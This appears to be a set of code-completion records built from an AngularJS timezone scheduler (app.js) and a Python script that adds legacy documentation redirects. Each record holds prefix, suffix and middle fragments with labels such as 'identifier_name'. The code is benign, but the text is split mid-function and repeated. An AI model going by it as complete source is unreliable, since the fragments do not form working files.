$scope.saveState = function() {
if (!$scope.ready)
return;
var buf = [];
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var item = zone.urlKey;
if (zone.isHome)
item += '!';
buf.push(item);
}
var params = {};
params.date = moment($scope.day).format('YYYY-MM-DD');
if (buf.length > 0)
params.tz = buf.join(',');
if ($scope.scheduleMeeting)
params.range = $scope.timeRange[0] + ',' + $scope.timeRange[1];
      if (params.tz != $location.search().tz ||
          params.date != $location.search().date ||
          params.range != $location.search().range)
$location.search(params);
if ($scope.scheduleMeeting)
$scope.updateMeetingSummary();
};
$scope.updateMeetingSummary = function() {
var lines = [];
var fmt = 'HH:mm ddd, MMM D YYYY';
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var start = zone.dayStart.clone().add('minutes', $scope.timeRange[0] * 15);
var end = zone.dayStart.clone().add('minutes', $scope.timeRange[1] * 15);
if (i > 0)
lines.push('');
lines.push(zone.timezoneName + ' [' + start.format('z; [UTC]ZZ') +
(start.zone() != end.zone() ? '; timezone change' : '') + ']');
lines.push(start.format(fmt));
lines.push(end.format(fmt));
}
$scope.meetingSummary = lines.join('\n');
};
$scope.zonesDifferInURL = function(urlZones) {
if (urlZones.length != $scope.zones.length)
return true;
for (var i = 0; i < urlZones.length; i++) {
if (urlZones[i] !== $scope.zones[i].urlKey)
return true;
}
return false;
};
$scope.syncWithURL = function() {
var allZones = [];
var homeZone = null;
var params = $location.search();
var zones = (params.tz || '').split(',');
var dateChanged = false;
if (zones.length == 1 && zones[0] === '')
zones = [];
for (var i = 0; i < zones.length; i++) {
var zoneName = zones[i];
if (zoneName[zoneName.length - 1] == '!') {
zoneName = zoneName.substr(0, zoneName.length - 1);
homeZone = zoneName;
}
allZones.push(zoneName);
}
if (params.date) {
var newDate = moment(params.date, 'YYYY-MM-DD');
if (!moment(newDate).isSame(moment($scope.day))) {
$scope.day = newDate.toDate();
dateChanged = true;
}
}
if (params.range) {
var rangePieces = params.range.split(',');
$scope.timeRange = [parseInt(rangePieces[0], 10),
parseInt(rangePieces[1], 10)];
$scope.scheduleMeeting = true;
} else {
$scope.scheduleMeeting = false;
}
if (dateChanged || $scope.zonesDifferInURL(allZones)) {
$scope.homeZone = null;
$scope.zones = [];
if (homeZone === null && allZones.length > 0)
homeZone = allZones[0];
if (homeZone !== null)
$scope.addZone(homeZone);
for (i = 0; i < allZones.length; i++) {
if (allZones[i] !== homeZone)
$scope.addZone(allZones[i]);
}
$scope.sortByFunc(function(a, b) {
var idx1 = allZones.indexOf(a.urlKey);
var idx2 = allZones.indexOf(b.urlKey);
return idx1 - idx2;
});
$scope.checkForToday();
}
};
$scope.$on('$locationChangeSuccess', $scope.syncWithURL);
window.setTimeout(function() {
$scope.ready = true;
$scope.syncWithURL();
$('div.loading').hide();
$('div.contentwrapper').fadeIn('slow', function() {
window.setInterval(function() {
if ($scope.updateClocks())
$scope.$apply();
}, 1000);
});
}, 100);
});
timesched.directive('timezone', function() {
return {
restrict: 'ACE',
require: 'ngModel',
scope: {
datasets: '=',
ngModel: '='
},
link: function(scope, elm, attrs, ctrl) {
var localChange = false;
elm.typeahead({
name: 'timezone',
local: SELECTABLES,
valueKey: 'd',
engine: {compile: function() {
return {
render: function(context) {
var time;
try {
time = moment.tz(context.z).format('HH:mm');
} catch (e) {
time = '??:??';
}
return '<p>' + context.d + '\u00a0<em>' + time + '</em></p>';
}
};
}},
template: 'dummy'
});
function updateScope() {
var oldVal = elm.val();
scope.$apply(function() {
localChange = true;
scope.ngModel = elm.val();
});
elm.val(oldVal);
}
elm.on('typeahead:selected', function() {
ctrl.$setValidity('timezone', true);
updateScope();
elm.trigger('submit');
});
elm.on('typeahead:autocompleted', updateScope);
elm.bind('input', function() {
scope.$apply(function() {
var value = elm.val();
if (zoneExists(value)) {
localChange = true;
ctrl.$setValidity('timezone', true);
scope.ngModel = value;
} else {
ctrl.$setValidity('timezone', false);
}
});
});
scope.$watch('ngModel', function(newVal) {
if (localChange) |
elm.typeahead('setQuery', newVal || '');
}, true);
scope.$on('$destroy', function() {
elm.typeahead('destroy');
});
}
};
});
})();
| {
localChange = false;
return;
} | conditional_block |
app.js | 'use strict';
/* global moment */
var timesched = angular
.module('timesched', ['ui.bootstrap', 'ui.sortable', 'ui.slider'])
.config(function($locationProvider) {
$locationProvider.html5Mode(true);
});
(function() {
var SELECTABLES = [];
var SELECTABLES_BY_NAME = {};
var SELECTABLES_BY_KEY = {};
function | (zoneName) {
return zoneName.toLowerCase().replace(/^\s+|\s+$/g, '');
}
function zoneExists(input) {
return !!SELECTABLES_BY_NAME[normalizeZoneName(input)];
}
function lookupTimeZoneState(input) {
var zone = SELECTABLES_BY_NAME[normalizeZoneName(input)];
if (!zone) {
zone = SELECTABLES_BY_KEY[input];
if (!zone)
return null;
}
    var m = null;
try {
m = moment.tz(normalizeZoneName(zone.z));
} catch (e) {
}
return m !== null ? new TimeZoneState(m, zone) : null;
}
timesched.setTimezoneData = function(data) {
SELECTABLES = [];
SELECTABLES_BY_NAME = {};
SELECTABLES_BY_KEY = {};
for (var i = 0; i < data.selectables.length; i++) {
var sel = data.selectables[i];
SELECTABLES.push(sel);
SELECTABLES_BY_NAME[sel.d.toLowerCase()] = sel;
SELECTABLES_BY_KEY[sel.k] = sel;
}
};
function TimeZoneState(m, zone) {
this.tz = m.tz();
this.urlKey = zone.k;
this.offset = 0;
this.timezoneShortName = zone.n;
this.timezoneName = zone.d;
this.update();
}
TimeZoneState.prototype.update = function(day, homeZone) {
var reftz = homeZone ? homeZone.tz : this.tz;
var start = moment.tz(day, reftz).startOf('day');
var ptr = start.clone().tz(this.tz);
var offset = (start.zone() - ptr.zone()) / 60;
this.dayStart = ptr.clone();
this.homeOffset = (offset > 0 ? '+' : '') + offset;
this.timezoneOffsetInfo = ptr.format('[UTC] Z');
this.utcOffset = ptr.zone();
this.timezoneAbbr = ptr.format('z');
this.isHome = homeZone && homeZone.tz === this.tz;
this.timeCells = [];
for (var i = 0; i < 24; i++) {
if (i !== 0)
ptr.add('hours', 1);
this.timeCells.push({
hour: parseInt(ptr.format('H'), 10),
hourFormat: ptr.format('H'),
minute: parseInt(ptr.format('m'), 10),
minuteFormat: ptr.format('mm'),
tooltip: ptr.format('LLLL (z)')
});
}
if (ptr.zone() !== this.utcOffset) {
var endAbbr = ptr.format('z');
var endOffsetInfo = ptr.format('[UTC] Z');
if (endAbbr != this.timezoneAbbr)
this.timezoneAbbr += '/' + endAbbr;
if (endOffsetInfo != this.timezoneOffsetInfo)
this.timezoneOffsetInfo += '/' + endOffsetInfo;
}
this.updateClock();
};
TimeZoneState.prototype.updateClock = function() {
var now = moment.tz(this.tz);
var oldH = this.clockHour;
var oldM = this.clockMinute;
this.clockHour = now.format('H');
this.clockMinute = now.format('mm');
return this.clockHour !== oldH || this.clockMinute !== oldM;
};
timesched.controller('TimezoneCtrl', function($scope, $location, datepickerConfig) {
$scope.day = new Date();
$scope.isToday = true;
$scope.zones = [];
$scope.homeZone = null;
$scope.currentZone = null;
$scope.ready = false;
$scope.timeRange = [40, 68];
$scope.scheduleMeeting = false;
$scope.meetingSummary = '';
// make the datepicker show monday by default
datepickerConfig.startingDay = 1;
$scope.addInputZone = function() {
if ($scope.addZone($scope.currentZone))
$scope.currentZone = '';
};
$scope.addZone = function(zoneName) {
var zoneState = lookupTimeZoneState(zoneName);
if (zoneState === null)
return false;
$scope.zones.push(zoneState);
$scope.updateZones();
return true;
};
$scope.setAsHome = function(zone) {
$scope.homeZone = zone;
$scope.updateZones();
$scope.saveState();
};
$scope.removeZone = function(zone) {
for (var i = 0, n = $scope.zones.length; i < n; i++) {
if ($scope.zones[i] !== zone)
continue;
$scope.zones.splice(i, 1);
if ($scope.homeZone === zone) {
$scope.homeZone = null;
$scope.updateZones();
}
break;
}
};
$scope.sortByOffset = function() {
$scope.sortByFunc(function(a, b) {
return b.utcOffset - a.utcOffset;
});
};
$scope.sortByName = function() {
$scope.sortByFunc(function(a, b) {
a = a.timezoneName.toLowerCase();
b = b.timezoneName.toLowerCase();
return a == b ? 0 : a < b ? -1 : 1;
});
};
$scope.sortByFunc = function(sortFunc) {
var copy = $scope.zones.slice(0);
copy.sort(sortFunc);
$scope.zones = copy;
};
$scope.updateClocks = function() {
var rv = false;
$scope.zones.forEach(function(zone) {
if (zone.updateClock())
rv = true;
});
var wasToday = $scope.isToday;
$scope.checkForToday();
return rv || (wasToday != $scope.isToday);
};
$scope.checkForToday = function() {
if ($scope.homeZone === null)
return;
var now = moment.tz($scope.homeZone.tz).format('YYYY-MM-DD');
var dayStart = moment.tz($scope.day, $scope.homeZone.tz).format('YYYY-MM-DD');
$scope.isToday = now == dayStart;
};
$scope.updateZones = function() {
if (!$scope.zones.length)
return;
if ($scope.homeZone === null)
$scope.homeZone = $scope.zones[0];
$scope.zones.forEach(function(zone) {
zone.update($scope.day, $scope.homeZone);
});
};
$scope.$watch('day', function() {
$scope.updateZones();
$scope.saveState();
});
$scope.$watch('scheduleMeeting', function() {
$scope.saveState();
});
$scope.$watch('timeRange', function() {
$scope.saveState();
});
$scope.$watchCollection('zones', function() {
$scope.saveState();
});
$scope.saveState = function() {
if (!$scope.ready)
return;
var buf = [];
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var item = zone.urlKey;
if (zone.isHome)
item += '!';
buf.push(item);
}
var params = {};
params.date = moment($scope.day).format('YYYY-MM-DD');
if (buf.length > 0)
params.tz = buf.join(',');
if ($scope.scheduleMeeting)
params.range = $scope.timeRange[0] + ',' + $scope.timeRange[1];
      if (params.tz != $location.search().tz ||
          params.date != $location.search().date ||
          params.range != $location.search().range)
$location.search(params);
if ($scope.scheduleMeeting)
$scope.updateMeetingSummary();
};
$scope.updateMeetingSummary = function() {
var lines = [];
var fmt = 'HH:mm ddd, MMM D YYYY';
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var start = zone.dayStart.clone().add('minutes', $scope.timeRange[0] * 15);
var end = zone.dayStart.clone().add('minutes', $scope.timeRange[1] * 15);
if (i > 0)
lines.push('');
lines.push(zone.timezoneName + ' [' + start.format('z; [UTC]ZZ') +
(start.zone() != end.zone() ? '; timezone change' : '') + ']');
lines.push(start.format(fmt));
lines.push(end.format(fmt));
}
$scope.meetingSummary = lines.join('\n');
};
$scope.zonesDifferInURL = function(urlZones) {
if (urlZones.length != $scope.zones.length)
return true;
for (var i = 0; i < urlZones.length; i++) {
if (urlZones[i] !== $scope.zones[i].urlKey)
return true;
}
return false;
};
$scope.syncWithURL = function() {
var allZones = [];
var homeZone = null;
var params = $location.search();
var zones = (params.tz || '').split(',');
var dateChanged = false;
if (zones.length == 1 && zones[0] === '')
zones = [];
for (var i = 0; i < zones.length; i++) {
var zoneName = zones[i];
if (zoneName[zoneName.length - 1] == '!') {
zoneName = zoneName.substr(0, zoneName.length - 1);
homeZone = zoneName;
}
allZones.push(zoneName);
}
if (params.date) {
var newDate = moment(params.date, 'YYYY-MM-DD');
if (!moment(newDate).isSame(moment($scope.day))) {
$scope.day = newDate.toDate();
dateChanged = true;
}
}
if (params.range) {
var rangePieces = params.range.split(',');
$scope.timeRange = [parseInt(rangePieces[0], 10),
parseInt(rangePieces[1], 10)];
$scope.scheduleMeeting = true;
} else {
$scope.scheduleMeeting = false;
}
if (dateChanged || $scope.zonesDifferInURL(allZones)) {
$scope.homeZone = null;
$scope.zones = [];
if (homeZone === null && allZones.length > 0)
homeZone = allZones[0];
if (homeZone !== null)
$scope.addZone(homeZone);
for (i = 0; i < allZones.length; i++) {
if (allZones[i] !== homeZone)
$scope.addZone(allZones[i]);
}
$scope.sortByFunc(function(a, b) {
var idx1 = allZones.indexOf(a.urlKey);
var idx2 = allZones.indexOf(b.urlKey);
return idx1 - idx2;
});
$scope.checkForToday();
}
};
$scope.$on('$locationChangeSuccess', $scope.syncWithURL);
window.setTimeout(function() {
$scope.ready = true;
$scope.syncWithURL();
$('div.loading').hide();
$('div.contentwrapper').fadeIn('slow', function() {
window.setInterval(function() {
if ($scope.updateClocks())
$scope.$apply();
}, 1000);
});
}, 100);
});
timesched.directive('timezone', function() {
return {
restrict: 'ACE',
require: 'ngModel',
scope: {
datasets: '=',
ngModel: '='
},
link: function(scope, elm, attrs, ctrl) {
var localChange = false;
elm.typeahead({
name: 'timezone',
local: SELECTABLES,
valueKey: 'd',
engine: {compile: function() {
return {
render: function(context) {
var time;
try {
time = moment.tz(context.z).format('HH:mm');
} catch (e) {
time = '??:??';
}
return '<p>' + context.d + '\u00a0<em>' + time + '</em></p>';
}
};
}},
template: 'dummy'
});
function updateScope() {
var oldVal = elm.val();
scope.$apply(function() {
localChange = true;
scope.ngModel = elm.val();
});
elm.val(oldVal);
}
elm.on('typeahead:selected', function() {
ctrl.$setValidity('timezone', true);
updateScope();
elm.trigger('submit');
});
elm.on('typeahead:autocompleted', updateScope);
elm.bind('input', function() {
scope.$apply(function() {
var value = elm.val();
if (zoneExists(value)) {
localChange = true;
ctrl.$setValidity('timezone', true);
scope.ngModel = value;
} else {
ctrl.$setValidity('timezone', false);
}
});
});
scope.$watch('ngModel', function(newVal) {
if (localChange) {
localChange = false;
return;
}
elm.typeahead('setQuery', newVal || '');
}, true);
scope.$on('$destroy', function() {
elm.typeahead('destroy');
});
}
};
});
})();
| normalizeZoneName | identifier_name |
add_legacy_redirects.py | import fileinput
import re
import json
import os
from collections import defaultdict
from pathlib import Path
# This script is still very much a work in progress.
# It does a pretty good job matching "new" style urls using a combination of
# scraped Docs 1.0 site data, and the legacy_redirects_metadata.json file.
# "Old" style urls have had initial work done to map them, but since
# we don't currently have any docs live that used "old" style urls,
# this code is commented out until it's needed (and will need to be developed further)
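# Roughly, the two URL shapes this script tells apart look like the following
# (illustrative examples only -- the product/guide path segments are made up, not
# taken from the scraped data):
#
#   "new" style: https://www.enterprisedb.com/edb-docs/d/some-product/user-guides/some-guide/9.6/some_page.html
#   "old" style: https://www.enterprisedb.com/edb-docs/d/some-product/user-guides/some-guide/9.6/some_page.1.23.html
#                plus "toc.html" pages; see determine_url_scheme() below.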
ANSI_STOP = '\033[0m'
ANSI_BOLD = '\033[1m'
ANSI_BLUE = '\033[34m'
ANSI_GREEN = '\033[32m'
ANSI_YELLOW = '\033[33m'
ANSI_RED = '\033[31m'
NEW_URLS_REMOVED_FILES = ['genindex', 'introduction', 'conclusion', 'whats_new']
OLD_URLS_REMOVED_FILES = ['toc']
def determine_url_scheme(url):
if re.search(r'\.\d+\.html', url) or 'toc.html' in url:
return 'old'
else:
return 'new'
def add_urls_to_output(url, path, output):
    output[str(path)].append(url)
def write_redirects_to_mdx_files(output):
written = 0
for filepath in Path('product_docs/docs').rglob('*.mdx'):
redirects = output[str(filepath)]
in_frontmatter = False
injected_redirects = False
in_existing_redirect_section = False
for line in fileinput.input(files=[filepath], inplace=1):
if not injected_redirects and line.startswith('---'):
if in_frontmatter and redirects:
written = written + 1
# print redirects at the end of the frontmatter
print('legacyRedirectsGenerated:')
                    print(' # This list is generated by a script. If you need to add entries, use the `legacyRedirects` key.')
for redirect in redirects:
relative_redirect = redirect.split('https://www.enterprisedb.com')[1]
print(' - "{}"'.format(relative_redirect))
injected_redirects = True
in_frontmatter = True
# block existing legacyRedirects from being written back out
if line.startswith('legacyRedirectsGenerated:'):
in_existing_redirect_section = True
elif in_existing_redirect_section and not (line.startswith(' -') or line.lstrip().startswith('#')):
in_existing_redirect_section = False
if not in_existing_redirect_section:
print(line, end="")
return written
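# For reference, a sketch of the frontmatter this script injects into a matched .mdx
# file (hypothetical title and redirect path, shown only to illustrate the output of
# write_redirects_to_mdx_files):
#
#   ---
#   title: "Some Page"
#   legacyRedirectsGenerated:
#     # This list is generated by a script. If you need to add entries, use the `legacyRedirects` key.
#     - "/edb-docs/d/some-product/user-guides/some-guide/9.6/some_page.html"
#   ---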
# These functions are only used by the commented out "old" url style handling
def title_from_frontmatter(filepath):
mdx_file = open(filepath)
for line in mdx_file:
if line.startswith('title:'):
mdx_file.close()
return line.split('title:')[1].strip().replace('"', '')
mdx_file.close()
def headings_from_mdx(filepath):
headings = [] | headings.append(
normalize_title(heading_re.sub('', line))
)
mdx_file.close()
return headings
def normalize_title(title):
title = re.sub(r'^\d*\.?\d*\.?\d*\.?\d*\s', '', title.strip())
title = re.sub(r'[\u2000-\u206F\u2E00-\u2E7F\\\'\-!"#$%&()*+,./:;<=>?@[\]^`{|}~’]', '', title)
title = title.lower().replace(' ', '').replace('*', '').replace('_', '').replace("\\", '').replace('™','').replace('®','')
return title
def determine_root_mdx_file(docs_path, mdx_folder = None):
root_path = docs_path
if mdx_folder:
root_path += '/{}'.format(mdx_folder)
index_path = root_path + '/index.mdx'
if not os.path.exists(index_path):
return None
return index_path
def print_report(report_dict):
for key in report_dict.keys():
value = report_dict[key]
print(ANSI_BOLD + key + ANSI_STOP)
if type(value) is defaultdict:
print_report(value)
else:
print(value)
def print_csv_report(report_dict):
print('Product,Version,Legacy Docs Folder')
for product, versions in report_dict.items():
for version, folders in versions.items():
for folder, urls in folders.items():
for url in urls:
print('{0},{1},{2},{3}'.format(product, version, folder, url))
metadata_file = open(os.path.dirname(__file__) + '/legacy_redirects_metadata.json')
legacy_metadata_by_product = json.load(metadata_file)
metadata_file.close()
json_file = open(os.path.dirname(__file__) + '/legacy_docs_scrape.json')
scraped_legacy_docs_json = json.load(json_file)
json_file.close()
json_file = open(os.path.dirname(__file__) + '/equivalent_versions.json')
equivalent_versions = json.load(json_file)
json_file.close()
legacy_urls_by_product_version = defaultdict(lambda : defaultdict(list))
for data in scraped_legacy_docs_json:
if data.get('product'):
legacy_urls_by_product_version[data.get('product')][data.get('version')].append(data)
processed_count = 0
matched_count = 0
new_count = 0
old_count = 0
missing_folder_count = 0
skipped = 0
no_files = 0
new_failed_to_match = []
new_failed_to_match_count = 0
old_failed_to_match = []
old_failed_to_match_count = 0
no_metadata = defaultdict(lambda : [])
version_missing = defaultdict(lambda : [])
missing_folder_metadata = defaultdict(lambda : defaultdict(set))
no_files_in_folder = defaultdict(lambda : defaultdict(set))
new_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
old_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
output = defaultdict(lambda : [])
for product in legacy_urls_by_product_version.keys():
product_data = legacy_urls_by_product_version[product]
for version in product_data.keys():
product_version_data = product_data[version]
effective_version = version
if product in equivalent_versions and version in equivalent_versions.get(product):
effective_version = equivalent_versions.get(product).get(version)
metadata = legacy_metadata_by_product.get(product)
if not metadata:
# no metadata configured for product
no_metadata[product].append(version)
continue
docs_path = 'product_docs/docs/{0}/{1}'.format(metadata['folder_name'], effective_version)
if not os.path.exists(docs_path):
# version does not match a version we have
version_missing[product].append(version)
continue
for legacy_page in product_version_data:
url = legacy_page['url']
if '/latest/' in url:
# skip latest urls if they appear, we'll handle those separately
continue
url_scheme = determine_url_scheme(url)
# if product version index page, can match right here
is_product_index = re.search(r'\/edb-docs\/p\/[\w-]+\/[\d.]+$', url)
if is_product_index:
index_path = determine_root_mdx_file(docs_path)
if index_path:
add_urls_to_output(url, index_path, output)
processed_count += 1
matched_count += 1
continue
legacy_folder = '/'.join(url.split('/')[6:8])
mdx_folder = metadata['subfolders'].get(version)
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
else:
mdx_folder = metadata['subfolders'].get('default')
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
if mdx_folder == 'skip':
skipped += 1
continue
else:
# At this point we'll say we're attempting to process this record for real
processed_count += 1
if mdx_folder == None: # don't want to catch empty string
# no metadata info for this folder
missing_folder_count += 1
missing_folder_metadata[product][version].add(legacy_folder)
continue
subfolder_docs_path = docs_path
if len(mdx_folder) > 0:
subfolder_docs_path = '{0}/{1}'.format(docs_path, mdx_folder)
if not os.path.exists(subfolder_docs_path):
# no files exist in this folder
no_files += 1
no_files_in_folder[product][version].add(subfolder_docs_path)
continue
subfolder_mdx_files = Path(subfolder_docs_path).rglob('*.mdx')
product_mdx_files = Path(docs_path).rglob('*.mdx')
match_found = False
if url_scheme == 'new':
new_count += 1
legacy_page_filename = url.split('/')[-1].replace('.html', '')
matched_file = []
for filename in subfolder_mdx_files:
mdx_page_filename = str(filename).split('/')[-1]
mdx_page_foldername = str(filename).split('/')[-2]
if (
mdx_page_filename == 'index.mdx' and
mdx_page_foldername != effective_version and
mdx_page_foldername != mdx_folder
):
mdx_page_filename = mdx_page_foldername
mdx_page_filename = re.sub(r'^\d*_', '', mdx_page_filename.replace('.mdx', ''))
if legacy_page_filename == mdx_page_filename:
add_urls_to_output(url, filename, output)
matched_count += 1
match_found = True
break # TODO handle duplicate url bug that affects some "new" style urls
# if no match found, check for files we remove
if legacy_page_filename in NEW_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
add_urls_to_output(url, index_path, output)
matched_count += 1
match_found = True
if not match_found:
new_failed_to_match[product][version][mdx_folder].append(url)
new_failed_to_match_count += 1
# print('no match found for {}'.format(url))
else:
old_count += 1
legacy_title = normalize_title(legacy_page['title'])
legacy_parents = [normalize_title(t) for t in legacy_page['sub_nav']]
print('searching for {0} under {1} in {2}'.format(legacy_title, legacy_parents, subfolder_docs_path))
title_matches = []
heading_matches = []
heading_matches_exact = []
for filename in product_mdx_files:
mdx_title = normalize_title(title_from_frontmatter(filename))
mdx_headings = headings_from_mdx(filename)
if legacy_title == mdx_title:
if str(filename).startswith(subfolder_docs_path):
output[str(filename)].append(url)
matched_count += 1
match_found = True
break
else:
title_matches.append(filename)
if legacy_title in mdx_headings:
if mdx_title in legacy_parents:
heading_matches_exact.append(filename)
heading_matches.append(filename)
if not match_found and len(heading_matches) > 0:
if heading_matches_exact:
heading_matches = heading_matches_exact
if len(heading_matches) > 1:
filtered_matches = [m for m in heading_matches if str(m).startswith(subfolder_docs_path) ]
if filtered_matches: heading_matches = filtered_matches
filename = heading_matches[0]
output[str(filename)].append(url)
matched_count += 1
match_found = True
if len(heading_matches) > 1:
print("multiple heading match")
for filename in heading_matches:
print('{0} ({1}) - {2} - {3}'.format(legacy_title, legacy_parents, filename, url))
if not match_found and len(title_matches) > 0:
filename = sorted(title_matches, key=lambda t: len(str(t)))[0]
output[str(filename)].append(url)
matched_count += 1
match_found = True
if len(title_matches) > 1:
print("multiple titles match")
for filename in title_matches:
print('{0} ({1}) - {2} - {3}'.format(legacy_title, legacy_parents, filename, url))
# if no match found, map what's new -> release notes
if not match_found and legacy_page_filename in ['whats_new.html'] and 'release_notes.mdx' in product_mdx_files:
output['release_notes.mdx'].append(url)
matched_count += 1
match_found = True
# if no match found, check for files we remove
legacy_page_filename = url.split('/')[-1].replace('.html', '')
if not match_found and legacy_page_filename in OLD_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
output[str(index_path)].append(url)
matched_count += 1
match_found = True
if match_found:
print("...FOUND!")
if not match_found:
ignore_legacy_titles = ['tableofcontents', 'introduction', 'typographicalconventionsusedinthisguide']
if legacy_title in ignore_legacy_titles: continue
old_failed_to_match[product][version][mdx_folder].append(url)
old_failed_to_match_count += 1
print('...NOT FOUND: {0} ({1}) - {2}'.format(legacy_title, legacy_parents, url))
print("\n{0}================ Report ================{1}".format(ANSI_BLUE, ANSI_STOP))
print("\n{0}-- No Metadata Configured (Not Processed) --{1}".format(ANSI_YELLOW, ANSI_STOP))
print_report(no_metadata)
print("\n{0}-- Version Missing (Not Processed) --{1}".format(ANSI_YELLOW, ANSI_STOP))
print_report(version_missing)
print("\n{0}-- Missing Folder in Metadata --{1}".format(ANSI_RED, ANSI_STOP))
print_report(missing_folder_metadata)
print("\n{0}-- No Folder --{1}".format(ANSI_RED, ANSI_STOP))
print_report(no_files_in_folder)
print("\n{0}-- Summary --{1}".format(ANSI_GREEN, ANSI_STOP))
print('matched {0} of {1} urls processed'.format(matched_count, processed_count))
print('missing folder in metadata: {0}'.format(missing_folder_count))
print('no folder: {0}'.format(no_files))
print('new style urls processed: {}'.format(new_count))
print('new style urls with no match: {}'.format(new_failed_to_match_count))
print('old style urls processed: {}'.format(old_count))
print('old style urls with no match: {}'.format(old_failed_to_match_count))
mdx_files_written = write_redirects_to_mdx_files(output)
mdx_file_count = 0
for path in Path('product_docs/docs').rglob('*.mdx'):
mdx_file_count += 1
print("wrote to {0} of {1} mdx files".format(mdx_files_written, mdx_file_count))
# print_csv_report(new_failed_to_match) | heading_re = re.compile(r'^#+ ')
mdx_file = open(filepath)
for line in mdx_file:
if heading_re.match(line): | random_line_split |
add_legacy_redirects.py | import fileinput
import re
import json
import os
from collections import defaultdict
from pathlib import Path
# This script is still very much a work in progress.
# It does a pretty good job matching "new" style urls using a combination of
# scraped Docs 1.0 site data, and the legacy_redirects_metadata.json file.
# "Old" style urls have had initial work done to map them, but since
# we don't currently have any docs live that used "old" style urls,
# this code is commented out until it's needed (and will need to be developed further)
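# Roughly, the two URL shapes this script tells apart look like the following
# (illustrative examples only -- the product/guide path segments are made up, not
# taken from the scraped data):
#
#   "new" style: https://www.enterprisedb.com/edb-docs/d/some-product/user-guides/some-guide/9.6/some_page.html
#   "old" style: https://www.enterprisedb.com/edb-docs/d/some-product/user-guides/some-guide/9.6/some_page.1.23.html
#                plus "toc.html" pages; see determine_url_scheme() below.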
ANSI_STOP = '\033[0m'
ANSI_BOLD = '\033[1m'
ANSI_BLUE = '\033[34m'
ANSI_GREEN = '\033[32m'
ANSI_YELLOW = '\033[33m'
ANSI_RED = '\033[31m'
NEW_URLS_REMOVED_FILES = ['genindex', 'introduction', 'conclusion', 'whats_new']
OLD_URLS_REMOVED_FILES = ['toc']
def determine_url_scheme(url):
if re.search(r'\.\d+\.html', url) or 'toc.html' in url:
return 'old'
else:
return 'new'
def add_urls_to_output(url, path, output):
    output[str(path)].append(url)
def write_redirects_to_mdx_files(output):
written = 0
for filepath in Path('product_docs/docs').rglob('*.mdx'):
redirects = output[str(filepath)]
in_frontmatter = False
injected_redirects = False
in_existing_redirect_section = False
for line in fileinput.input(files=[filepath], inplace=1):
if not injected_redirects and line.startswith('---'):
if in_frontmatter and redirects:
written = written + 1
# print redirects at the end of the frontmatter
print('legacyRedirectsGenerated:')
                    print(' # This list is generated by a script. If you need to add entries, use the `legacyRedirects` key.')
for redirect in redirects:
relative_redirect = redirect.split('https://www.enterprisedb.com')[1]
print(' - "{}"'.format(relative_redirect))
injected_redirects = True
in_frontmatter = True
# block existing legacyRedirects from being written back out
if line.startswith('legacyRedirectsGenerated:'):
in_existing_redirect_section = True
elif in_existing_redirect_section and not (line.startswith(' -') or line.lstrip().startswith('#')):
in_existing_redirect_section = False
if not in_existing_redirect_section:
print(line, end="")
return written
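# For reference, a sketch of the frontmatter this script injects into a matched .mdx
# file (hypothetical title and redirect path, shown only to illustrate the output of
# write_redirects_to_mdx_files):
#
#   ---
#   title: "Some Page"
#   legacyRedirectsGenerated:
#     # This list is generated by a script. If you need to add entries, use the `legacyRedirects` key.
#     - "/edb-docs/d/some-product/user-guides/some-guide/9.6/some_page.html"
#   ---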
# These functions are only used by the commented out "old" url style handling
def title_from_frontmatter(filepath):
mdx_file = open(filepath)
for line in mdx_file:
if line.startswith('title:'):
mdx_file.close()
return line.split('title:')[1].strip().replace('"', '')
mdx_file.close()
def headings_from_mdx(filepath):
headings = []
heading_re = re.compile(r'^#+ ')
mdx_file = open(filepath)
for line in mdx_file:
if heading_re.match(line):
headings.append(
normalize_title(heading_re.sub('', line))
)
mdx_file.close()
return headings
def normalize_title(title):
| determine_root_mdx_file(docs_path, mdx_folder = None):
root_path = docs_path
if mdx_folder:
root_path += '/{}'.format(mdx_folder)
index_path = root_path + '/index.mdx'
if not os.path.exists(index_path):
return None
return index_path
def print_report(report_dict):
for key in report_dict.keys():
value = report_dict[key]
print(ANSI_BOLD + key + ANSI_STOP)
if type(value) is defaultdict:
print_report(value)
else:
print(value)
def print_csv_report(report_dict):
print('Product,Version,Legacy Docs Folder')
for product, versions in report_dict.items():
for version, folders in versions.items():
for folder, urls in folders.items():
for url in urls:
print('{0},{1},{2},{3}'.format(product, version, folder, url))
metadata_file = open(os.path.dirname(__file__) + '/legacy_redirects_metadata.json')
legacy_metadata_by_product = json.load(metadata_file)
metadata_file.close()
json_file = open(os.path.dirname(__file__) + '/legacy_docs_scrape.json')
scraped_legacy_docs_json = json.load(json_file)
json_file.close()
json_file = open(os.path.dirname(__file__) + '/equivalent_versions.json')
equivalent_versions = json.load(json_file)
json_file.close()
legacy_urls_by_product_version = defaultdict(lambda : defaultdict(list))
for data in scraped_legacy_docs_json:
if data.get('product'):
legacy_urls_by_product_version[data.get('product')][data.get('version')].append(data)
processed_count = 0
matched_count = 0
new_count = 0
old_count = 0
missing_folder_count = 0
skipped = 0
no_files = 0
new_failed_to_match = []
new_failed_to_match_count = 0
old_failed_to_match = []
old_failed_to_match_count = 0
no_metadata = defaultdict(lambda : [])
version_missing = defaultdict(lambda : [])
missing_folder_metadata = defaultdict(lambda : defaultdict(set))
no_files_in_folder = defaultdict(lambda : defaultdict(set))
new_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
old_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
output = defaultdict(lambda : [])
for product in legacy_urls_by_product_version.keys():
product_data = legacy_urls_by_product_version[product]
for version in product_data.keys():
product_version_data = product_data[version]
effective_version = version
if product in equivalent_versions and version in equivalent_versions.get(product):
effective_version = equivalent_versions.get(product).get(version)
metadata = legacy_metadata_by_product.get(product)
if not metadata:
# no metadata configured for product
no_metadata[product].append(version)
continue
